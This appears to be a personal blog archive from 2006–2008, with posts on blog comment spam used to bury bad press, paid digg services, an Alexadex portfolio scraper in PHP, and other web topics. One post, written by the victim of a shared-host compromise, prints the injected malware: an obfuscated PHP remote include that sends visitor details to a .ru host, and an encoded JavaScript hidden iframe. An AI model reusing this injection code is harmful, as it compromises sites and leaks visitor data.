Archive for the 'Blog' Category

Sweeping Bad Press Under The Rug Using Junk Blog Comments

Tuesday, February 12th, 2008

I noticed an interesting comment on this blog while deleting comment spam a few days ago.

1. Jim Mirkalami Says:
February 6th, 2008 at 6:25 pm

I have been a frequent visitor of this blog for some time now, so I thought it would be a good idea to leave you with my thanks.

Regards,
Jim Mirkalami

It has that “almost certainly spam but hard to be dead sure” feel to it that a lot of spam comments have. Strangely although it is an optional field, he gives yahoo.com as his website. This seemed even stranger when you note he seems to have his own website (jimmirkalami.com) unless there are two single fathers of two with that name in Ontario.

It seems like a pretty uncommon name, so I google for him. The first few links are news stories alleging questionable ethics in Canadian Auctions for jewelry and Persian rugs. Curiouser and curiouser.

Of course, I am only guessing that it is an uncommon name. It could be the equivalent of Smith in the middle east. It certainly seems fairly popular in among Toronto rug merchants.

Here is my theory.

I’d be upset if the first google result for my (fairly uncommon) name led to a page that started “No charges laid …”.

Knowing a little about SEO and the way google ranks pages, I think you could fairly quickly bury those stories by commenting on a lot of blogs. It would be harder if the story was all over major media. Not many blogs have a pagerank that can compete with CNN or the NYT (pagerank 9), but Google ranks local media about on par with a popular blog. There are no shortage of blogs with a pagerank around 5 or 6. Google only gives canada.com 7.

The comments appear to be somewhat targeted. They seem to appear on blogs (but not always posts) that mention the word ‘auction’ or the word ‘Canada’. There are automated comment spam tools that will find suitable blogs for you, or in a little more time you could do it by hand from any of the blog search engines. A few days later he commented on another post of mine that does contain the word auction (because it is about ebay).

The text of that comment is

Jim Mirkalami Says:
February 8th, 2008 at 3:13 pm

I have been visiting this site a lot lately, so i thought it is a good idea to show my appreciation with a comment.

Thanks,
Jim Mirkalami

PS: I am a single dad! ;)

Other ones you will see around the place are:

Tammy kingston, on February 5th, 2008 at 5:18 pm Said:

Jim Mirkalami, the very globally highly regarded auctioneer, is a peaceful man single father of two beautiful children. He is also a regular reader of this blog. Great job you ppl!

Aslan, on February 7th, 2008 at 10:06 pm Said:

He is a kind and very loving man.

I don’t know who Tammy is. I get no useful search results for “Tammy Mirkalami”, but I am guessing she is from Kingston (which is near Toronto). I am guessing the Aslan above is more likely to be Aslan Mirkalami (owner of rugman.com) than a lion king from Narnia.

Does this variety of reputation management work? Sure does. A few days later, and at least the top 10 pages of search results for his name are all blogs. The negative press is presumably still indexed, but has dropped way down the list where only a dedicated searcher will find it. He many have overplayed his hand though, as the first result at the moment is a blogger calling him a spammer.

So here are some morals to this story.

  • If you are going to have dissatisfied customers, make sure you have few enough that only local media cover the allegations.
  • Commenting furiously on blogs will give you Google results that effectively act as noise
  • Try to tailor the comments to the blogs a little. It would not take much more time, and would make the effort invisible.

Oh, and surely you already knew that whenever you buy anything (including rugs and jewelery) valuations from the seller are worth only slightly more than the paper your blog is written on.

Digg’s Kevin Rose Has an Account on User/Submitter?

Saturday, March 3rd, 2007

If you missed it, User/Submitter is a paid service allowing people to buy diggs.

They are very upfront about their business model. Submitters (people who want stories promoted) pay $20 plus $1 per digg. Users (digg users who’s second job as a WoW gold farmer is getting tedious) get paid about 17c per digg. So buying 100 diggs costs $120, and in theory nearly $17 of that gets paid out to diggers, there is a $20 payout minimum, so the chances of many people diligently digging away and making 120 paid diggs before their account gets noticed and shut off seems unlikely. In either case, it is nice profit margin while they can get away with it.

Digg unsurprisingly don’t seem to be fans. Poking around, I can see accounts are being disabled. One of mine got disabled, but that might be a bad example because I was not very subtle. Commenting on stories that I dugg that I had dugg them for 17c is probably more blatant than most. Result:
disabled

Looking at other accounts with suspicious behaviour though I see a few of these:
invalid

Privacy is not particularly well guarded at User/Submitter. If you want to know if a digg user name is registered there, then try to register it. An interesting username to try is kevinrose.

Kevin Rose On User/Submitter

Of course, the experiment is somewhat flawed. You can only check once, and while a negative result is definitive, a positive result might just mean that somebody else performed the same experiment before you. Rumours of Digg’s demise might be popular, but I don’t think Kevin yet needs a side job paying 17c per click.

Suspicious behaviour though is not hard to find. Here are a list of Digg stories that received paid Diggs in the last few hours.
http://digg.com/videos/people/Backflipping_Midget_Chased_by_Cops
http://digg.com/offbeat_news/Russian_wrestling_gone_amazing
http://digg.com/gadgets/The_ULTIMATE_domain_search_tool
http://digg.com/world_news/Photo_essay_Unexploded_bombs_are_everywhere_in_Iraq
http://digg.com/tech_news/Lenovo_Recalls_209_000_Notebook_Batteries
http://digg.com/2008_us_elections/Who_Else_Wants_to_Bash_Bush_Now
http://digg.com/videos/educational/Blind_Turkish_Book_Reviewer_The_Alchemist
http://digg.com/gadgets/Nikon_D40_Review_Good_Camera_at_a_Great_Value

Unsurprisingly, there are a number of the same users digging many of them.

What a social site should do about abuse is a harder problem. Any competitive environment is bound to get people gaming or abusing the system. I am not sure that disabling accounts is the best solution though. If I was a 3rd world subsistence gold farmer sitting in an internet cafe clicking links for a few cents a time and my account got disabled I would just create a new one that needs to be detected and disabled. If my account silently got flagged as a source of worthless diggs, and just ignored in calculations, then I would merrily continue clicking away and over time nearly all bought diggs would be worthless because they would mostly be being paid out to account that have already been detected.

Publicly disabling accounts is good for maintaining the appearance of transparency, but longer term, allowing abusive users individual sandboxes to play in lets them waste time without affecting others. In a system where reregistering under another alias is painless, disabling accounts is not a very effective deterrent.

OfficePirates.com - Calling all slackers

Wednesday, March 1st, 2006

OfficePirates.com is an interesting venture*. They are aimed specifically at the 21-34 year old, male, office worker who hates his job and spends more time surfing the web than working demographic. Did you know that was a demographic? Now I will admit it is not quite like one of those job ads you sometimes read that say “To be considered, the applicant should have between 4.3 and 4.32 years C++ experience, like french fry sandwiches and be named Bob,” but it still seems fairly specific to me.

Of course, in time honoured Web 2.0 style, viral marketing is a big part of the plan. Their hordes of office slackers are, as we speak, supposed to be emailing each other to say “Have you seen the Girls in Bras video? It is hilarious.”

There are a few small problems with the plan though, the video is not hilarious, and the people behind it seem to have only passing familiarity with some standard internet practices. For example, the comment field in their blog looks like this whenever I look at it:

Closed?

Did you used to think the internet operated 24 hours a day? So did I. I am not even sure what time zone that 9-6 is in, but apparently there is only one.

Some of their stuff is quite good. I liked Half day man, and they have money and a marketing budget behind them so being initially a bit thin on content will presumably be easy to solve, but it is hard to run a major website when you don’t seem to understand the genre conventions and when parts of your technology suck. I hate the Flash video player they are using. It does not cache content, so if your connection struggles you can’t pause and wait for the download to catch up. You just have to watch it stutter.

I also keep seeing [an error occurred while processing this directive]. What is that? A server side include error message, or an early version of ASP error message? How very Web 1.0.

* and I am not only saying that because I own lots of their stock on Alexadex, or because they have a really cool logo

Update: OfficePirates.com was shut down on September 1 after failing to find an audience. Personally, I only noticed six months later because I had a broken link.

Fun with Alexadex

Monday, February 27th, 2006

In case you are not aware, Alexadex is a virtual stock market game, where the values of stocks depend on their Alexa reach ratings.

Because I have too much time on my hands, I wanted to track my portfolio value in the sidebar of my blog. Look over there somewhere —–> and you will probably see it.

In case it holds amusement value to somebody, here is the code. It relies on PHP and MySQL and just does some simple screen scraping.

The fact that this URL works:
http://alexadex.com/ad/api?&method=getQuote&url=lukewelling.com
hints that there might be an API to do this at some point, but for now, I am screen scraping. (url pulled from Cal Evans’ blog)

The database table looks like this:

CREATE TABLE alexadex (
  timestamp timestamp(14) NOT NULL,
  value int(11) NOT NULL default '0',
  PRIMARY KEY  (timestamp)
)

From a cron job I am running:

<?php
require('functions.php');

connectToDb();

$username = 'tangledweb';
$url = "http://alexadex.com/ad/user/$username";
$marker = 'total:</b></td><td align=right>$';

$current =  scrape( $url, $marker );
if($current!==false)
{
   echo "stored: ";
   storeCurrent($current);
}

echo $current; 

?>


In case it is not obvious, my Alexadex username is tangledweb.

In my blog sidebar I have:

<?php
require('functions.php');
echo '<li><a href = "http://alexadex.com/ad/user/tangledweb"
      >My current portfolio is $';
$temp = getMostRecentFromDb();
echo number_format($temp['value']).'</a>';
?>

The functions these rely on are:

function storeCurrent($value)
{
 $value = intval($value);
 $sql = "INSERT
         INTO alexadex
         VALUES (NOW(), $value)";
  $result = mysql_query($sql);
}

function getMostRecentFromDb()
{
  $sql = "SELECT *
          FROM alexadex
          WHERE 1
          ORDER BY `timestamp` DESC
          LIMIT 1";

  $result = mysql_query($sql);

  return mysql_fetch_array($result);
}

function scrape($url, $marker, $maxLength = 50)
{
  $page = file_get_contents($url);
  if($page === false)
  {
    return false;
  }
  $pos = strpos($page, $marker);
  if($pos === false)
  {
    return false;
  }
  $value= substr($page, $pos + strlen($marker), $maxLength);
  $value= str_replace(',', '', $value);
  $value= intval($value);
  return $value;
}

function connectToDb()
{
  $connection = mysql_connect("host",
                              "user",
                              "pass");
  mysql_select_db("dbname", $connection);
}

This code comes with no warranty of any kind. You can have it as public domain, but I would appreciate a link to this blog if you use it. I hope it still works. WordPress seems to really, really want to mess with it when it saves it.

Spyware and popups close to home

Monday, February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleezy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it has been altered and code has been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from that (perhaps “error_reporting(0)”) to make sure you are not in the same boat.

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sort of business practices and the arseclowns that practice them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which un-obsfucated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic sounding names created, like date.php and report.php and .htaccess files created or appended to to direct 404s to the new bogus files.

Blog measurement

Thursday, February 9th, 2006

Statistics about blogs are all the rage at the moment.

Steve Rubel says it is time that we had standards so trends can be gauged and advertisers can be appropriately gouged. He is right, but his evidence for the existence of a problem is flawed.

He complains that a study in November 2004 put readership at 58% while a
different more recent study put it at 20%.

Actually, the BBC 2004 report says readership is up by 58%, taking it to 27%
of online Americans. The article says 120 million Americans were online in
2004, which is about 40% of the population. That means that study was
saying 11% of the population had read a blog.

Even without measurement standards, the increase from 11% “have read a blog”
to 20% read blogs “frequently” or at least “occasionally” seems fairly
consistent and believable over the space of a year or so.

One of the challenges for any sort of automated measuring is going to be spam detection. Here is an example of a real blog that has been left unattended for a while. Detecting pure link-farms seems to be a hard enough problem in search. Removing spam noise from a site that contains a mixture of real and spam comments has to be harder.

Can somebody explain read.io to me?

Wednesday, February 8th, 2006

Am I missing the point, or is it kind of … ummm … well, stupid?

It is not live yet, so I have not seen it and might be missing an important detail. As I understand it, you sign up and it takes entries from the feed of your blog and converts them into synthetic speech for others to download.

Here is a sample

I can see why that might be fun once, but except for your blind blog readers, I cannot see why it is a good thing. Even if you have a significant number of blind readers, they presumably already have screen reading software which is doing the conversion at the client end where it should be being done. Who would rather download a 5Mb MP3 file than a 5 Kb html file?

I could kind of see some value in it if you could use it as an aggregator, grabbing new entries from a bunch of blogs that you read regularly and filling your MP3 player with them overnight so you could listen to them on the way to work. I still think the conversion should be done at the client end, but at least I could see a point to it. I don’t see why offering your readers the opportunity to download a stilted, machine converted podcast of your writings would have more than novelty value.

Every new internet technology can be used for vanity searches

Thursday, February 2nd, 2006

From Technorati: Blog posts that contain Luke Welling per day for the last 30 days.
Technorati Chart

Hello world!

Monday, January 30th, 2006

It has reached the point where nearly everybody I knew has a blog. Some of the people I know even have pets with blogs, but that is what happens when you associate with nerds.

Of course 86% of the bloggers I know long ago got bored with updating their blogs, and left them lying around gathering dust.

Here then, is my blog. It too, stands about a 5/6th chance of getting abandoned.